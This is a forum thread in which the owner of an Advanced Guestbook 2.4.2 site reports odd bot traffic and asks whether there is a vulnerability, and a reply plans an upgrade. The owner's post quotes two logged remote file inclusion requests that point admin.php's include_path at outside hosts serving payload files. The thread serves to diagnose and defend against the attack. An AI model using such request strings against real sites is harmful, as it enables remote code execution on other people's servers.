|
Chi Kien Uong
Geranienstraße 30
71034 Böblingen
Deutschland / Germany
|
If you are not registered or logged in, you may still use these forums but with limited features.
Show recent topics
|
|
|
| Author |
Message |
|
|
Thanks Carbonize,
I guess that I should upgrade to 2.4.4 or Lazarus to make the site a bit more secure.
|
 |
|
|
A while ago I downloaded Advance Guest Book 2.4.2 to my website. For some time now, AWSTATS has shown a lot of visits to the admin.php, index.php and image.php pages of the guestbook, mainly by robots. It also indicates a lot of referrals to my site from strange sites (usually on-line gaming or similar) which have no logical relationship with my site (genealogy and trekking). I checked out site visitors via CPANEL and found addresses of the type below
/xfile1/admin.php?include_path=http://randycute.com/zfxid1.txt??
/xfile1/admin.php?include_path=http://www.cyber-marche.fr/media/fx29id.txt??
/xfile/admin.php is the admin page of Advanced Guestbook 2.4.2 on my site - the rest seems to be a redirect to a different site - which look a bit suspect to me. I certainly have not placed an such pathways.
Can you tell me what could be happening? Is there a vulnerability in Advanced Guestbook that is being exploited by dodgy sites? If there is a problem, has it been resolved in a leter version of Advanced Guestbook?
Thanks for any help.
|
|
|
|
|
|
|
|
Based on the open source JForum
|
![[Search]](/forum/templates/html/images/icon_mini_search.gif){kind=icon}
![[Hottest Topics]](/forum/templates/html/images/icon_mini_recentTopics.gif){kind=icon}
![[Members]](/forum/templates/html/images/icon_mini_members.gif){kind=icon}
![[FAQ]](/forum/templates/html/images/icon_mini_faq.gif){kind=icon}
![[Register]](/forum/templates/html/images/icon_mini_register.gif){kind=icon}
Register![[Login]](/forum/templates/html/images/icon_mini_login.gif){kind=icon}
Login